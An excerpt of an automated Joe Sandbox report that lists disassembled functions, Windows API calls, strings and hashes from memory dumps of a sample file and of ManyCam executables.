                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                            • String ID: UNC$\\?\
                                                                                                                                            • API String ID: 1611563598-253988292
                                                                                                                                            • Opcode ID: 610a7e57783d330e900d96691c6462c34e192da23002dbdcd8be488447dfc4da
                                                                                                                                            • Instruction ID: 70393224b0711bdba7c13fbbddfa2649ffc196c627317e7c45833d23dfda8624
                                                                                                                                            • Opcode Fuzzy Hash: 610a7e57783d330e900d96691c6462c34e192da23002dbdcd8be488447dfc4da
                                                                                                                                            • Instruction Fuzzy Hash: EA418617E1824243EA60AB51E4413FD17ACAF45BC4F418432E94DC76AEEF6EE645E30B
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                            • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                            • API String ID: 3307058713-1957095476
                                                                                                                                            • Opcode ID: 4792c73b54b9531411a2c8b3e1b98346e7c626cb7e0442df3ceab62394588400
                                                                                                                                            • Instruction ID: 86e8c95cd4d7ded94f41c49f3e175b2f7fe07e09c49ac58bc9a655b5d6589fba
                                                                                                                                            • Opcode Fuzzy Hash: 4792c73b54b9531411a2c8b3e1b98346e7c626cb7e0442df3ceab62394588400
                                                                                                                                            • Instruction Fuzzy Hash: 8D41E337A0864297FF14DF26A8402B927A8FF847C4B544036E90DC7B45DE3EE651D746
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DialogParamVisibleWindow
                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                            • API String ID: 3157717868-3292211884
                                                                                                                                            • Opcode ID: 38ffe96a04da1ef8b229ef6c3c02df9989c78c356f34de83144800e32c0f524c
                                                                                                                                            • Instruction ID: f1d4005895b51e0403762b0e96c0160b67911487d024c3da1357b1306adc2c3e
                                                                                                                                            • Opcode Fuzzy Hash: 38ffe96a04da1ef8b229ef6c3c02df9989c78c356f34de83144800e32c0f524c
                                                                                                                                            • Instruction Fuzzy Hash: D141E457A0D68247FE109B11FC113B52B24AF4A784F980031ED8DC77A6CE2FE459D75A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$CurrentFileProcessswprintf
                                                                                                                                            • String ID: %u.%03u
                                                                                                                                            • API String ID: 7918461-1114938957
                                                                                                                                            • Opcode ID: 0339fca6f3e76c0bbacb09d0089dfae5a3832e89d900cb471cb2f837f4fc2496
                                                                                                                                            • Instruction ID: 4626f31539ebe809f2a191adee658eb31e7c7d94cc9adf8d1dfaef5f4c209282
                                                                                                                                            • Opcode Fuzzy Hash: 0339fca6f3e76c0bbacb09d0089dfae5a3832e89d900cb471cb2f837f4fc2496
                                                                                                                                            • Instruction Fuzzy Hash: 4021D523A1878687E610AB25E8413E96354FB88780F540131FA4DCF79AEE3EE5069749
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                            • API String ID: 2650857296-834177443
                                                                                                                                            • Opcode ID: bbb8d02e22d8a129956493a4e00a66c4dddf6103d93e0c354bcf6e5b54040a6b
                                                                                                                                            • Instruction ID: 4674cd70ab81d91487ab6b11d43f22a0dec6fbca5b1eefd3e95bf84caa04fe37
                                                                                                                                            • Opcode Fuzzy Hash: bbb8d02e22d8a129956493a4e00a66c4dddf6103d93e0c354bcf6e5b54040a6b
                                                                                                                                            • Instruction Fuzzy Hash: DB31D123A09A4297EE109F15E4403F92368FB45788F500032EE8D8BBA6DE3EE505E745
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleType
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 3000768030-2766056989
                                                                                                                                            • Opcode ID: 19b25201cd048e3610150cd041767a6cc9c18e2f53e4e5ad94b6b0a54806eae3
                                                                                                                                            • Instruction ID: 8158b26eaaa2910b90345233f06f297c4a1acc69f5f9976c7afaf230ecb0899f
                                                                                                                                            • Opcode Fuzzy Hash: 19b25201cd048e3610150cd041767a6cc9c18e2f53e4e5ad94b6b0a54806eae3
                                                                                                                                            • Instruction Fuzzy Hash: 38219823B0864243EB648B25AC952392B59EB85774F240335D67E877F4CE3BDA81E346
                                                                                                                                            APIs
                                                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EF6D658A), ref: 00007FF6EF6D900C
                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EF6D658A), ref: 00007FF6EF6D9052
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                            • Opcode ID: c2fd1e23ba378c3f0c29f0fef5388ea02fe57b74af0b7d3051705ddd8690358c
                                                                                                                                            • Instruction ID: 9c7a5e16b4aa22cd2a8efc6f6f067736898fe26124666330aff010183a876986
                                                                                                                                            • Opcode Fuzzy Hash: c2fd1e23ba378c3f0c29f0fef5388ea02fe57b74af0b7d3051705ddd8690358c
                                                                                                                                            • Instruction Fuzzy Hash: 27111633618B8183EB209F15F44026977A9FB88B84F284235EA8D47B68EF3ED551CB04
                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C594F
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C595A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastObjectSingleWait
                                                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                            • API String ID: 1211598281-2248577382
                                                                                                                                            • Opcode ID: 4ee0e10abfb07af31fa03507a44e01225ea2c88327e87d6fea58f9efe9c9d896
                                                                                                                                            • Instruction ID: 786e76e9b1a26399294f132beb2e54cb6d6b6dae9942a2c62bd56e5da07c9fcb
                                                                                                                                            • Opcode Fuzzy Hash: 4ee0e10abfb07af31fa03507a44e01225ea2c88327e87d6fea58f9efe9c9d896
                                                                                                                                            • Instruction Fuzzy Hash: 51E01A23E0A90243EA44A731AC827B423166F91330F900731E03DC21E6AF2FA646D70B
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FindHandleModuleResource
                                                                                                                                            • String ID: RTL
                                                                                                                                            • API String ID: 3537982541-834975271
                                                                                                                                            • Opcode ID: 060aac376ff9500f96b7631082418d81147b30c95d997cfc0faa78073afdc2ec
                                                                                                                                            • Instruction ID: 6346e785ece024da65442266aab96284789e2684d775128897fa12fb6ffacef2
                                                                                                                                            • Opcode Fuzzy Hash: 060aac376ff9500f96b7631082418d81147b30c95d997cfc0faa78073afdc2ec
                                                                                                                                            • Instruction Fuzzy Hash: 0BD05E53F0974683FF198B71AC453B513545F69B41F881438CC5E8A380EF6EE299D71A
                                                                                                                                            APIs
                                                                                                                                            • _CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8,00000001), ref: 00BB79BC
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB79CD
                                                                                                                                            • _CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8), ref: 00BB7A2E
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7A3F
                                                                                                                                            • _CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?), ref: 00BB7AAE
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7ABF
                                                                                                                                            • _CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8), ref: 00BB7C53
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7C5C
                                                                                                                                            • _CIpow.MSVCR80 ref: 00BB7D5F
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7D70
                                                                                                                                            • _CIpow.MSVCR80 ref: 00BB7E3D
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7E4E
                                                                                                                                            • _CIpow.MSVCR80 ref: 00BB7F2D
                                                                                                                                            • _ftol.MSVCR80 ref: 00BB7F3E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Ipow_ftol
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 36068165-0
                                                                                                                                            • Opcode ID: 228648f2377b8f0835d99bce623a426c9a0cc1d130142cbc6b2f8ccf6da6a035
                                                                                                                                            • Instruction ID: 9f9375579b6620483451be579412111554021df9604049c1d05437851365f932
                                                                                                                                            • Opcode Fuzzy Hash: 228648f2377b8f0835d99bce623a426c9a0cc1d130142cbc6b2f8ccf6da6a035
                                                                                                                                            • Instruction Fuzzy Hash: 9A027D706487428BD310DF24D8957AAFBF5FFC8300F5149AEE4AA9B261DB70E855CB42
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00BDC2BF
                                                                                                                                            • _crt_debugger_hook.MSVCR80(00000001), ref: 00BDC2CC
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BDC2D4
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00BE29FC), ref: 00BDC2DF
                                                                                                                                            • _crt_debugger_hook.MSVCR80(00000001), ref: 00BDC2F0
                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00BDC2FB
                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00BDC302
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3369434319-0
                                                                                                                                            • Opcode ID: 31a740d789ef69da4a448668e309fb411f4ff643b67d9d784aeaa05b1f96b1fb
                                                                                                                                            • Instruction ID: 8679256a481723e691cd38c6c0d72c647c53e90032a3884b082742fa6f7b56ee
                                                                                                                                            • Opcode Fuzzy Hash: 31a740d789ef69da4a448668e309fb411f4ff643b67d9d784aeaa05b1f96b1fb
                                                                                                                                            • Instruction Fuzzy Hash: BC21FFB5801385DFC700DF68ECD5A487FA5FB08310F00445AE9199B3A1EFB0988A8F88
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00416650: FindClose.KERNEL32(55C35DE5,00000000,?,004164B1,00000000,000001E2,-0000012B), ref: 00416686
                                                                                                                                            • lstrlenW.KERNEL32(00000000,00000000,000001E2), ref: 004164C4
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000104,?,00000000), ref: 0041652C
                                                                                                                                            • SetLastError.KERNEL32(0000007B), ref: 0041654D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 333540133-0
                                                                                                                                            • Opcode ID: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
                                                                                                                                            • Instruction ID: f4e42fcc4f8ec7ae6713741ac17fac935eec9a5453ba0a6ca1ec1d98cf041219
                                                                                                                                            • Opcode Fuzzy Hash: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
                                                                                                                                            • Instruction Fuzzy Hash: 8E413AB0A00219AFDB00DFA4DC84BEE77B2BF44305F11856AE515AB385C778D984CB98
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                              • Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
                                                                                                                                              • Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000001,00571980,00000000,?,?,0056F520,7EC02BB4,?,?,?,?,00000000,005334CC,000000FF), ref: 004B21C6
                                                                                                                                            Strings
                                                                                                                                            • CGraphMgr::AddFilterByCLSID name=%s, xrefs: 004B214A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$CreateInstanceclock
                                                                                                                                            • String ID: CGraphMgr::AddFilterByCLSID name=%s
                                                                                                                                            • API String ID: 918117742-3942708501
                                                                                                                                            • Opcode ID: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
                                                                                                                                            • Instruction ID: 6627f4356a5c181cec56012d4899b026b21b0b7ca21db5bf76fe668c849b38a9
                                                                                                                                            • Opcode Fuzzy Hash: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
                                                                                                                                            • Instruction Fuzzy Hash: C2411C75900209EFDB08DF98D984BEEB7B4FB08314F10865EE815A7390DB74AA01CB64
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2884f95fcdafe70c70ecd4019d7835bcd498a4b6d07c35c5e4d26ae6450e3503
                                                                                                                                            • Instruction ID: e55d7fbf39b58b7cd40c08828abb676aef87834b5fc5c75b877ec82b140fc7a0
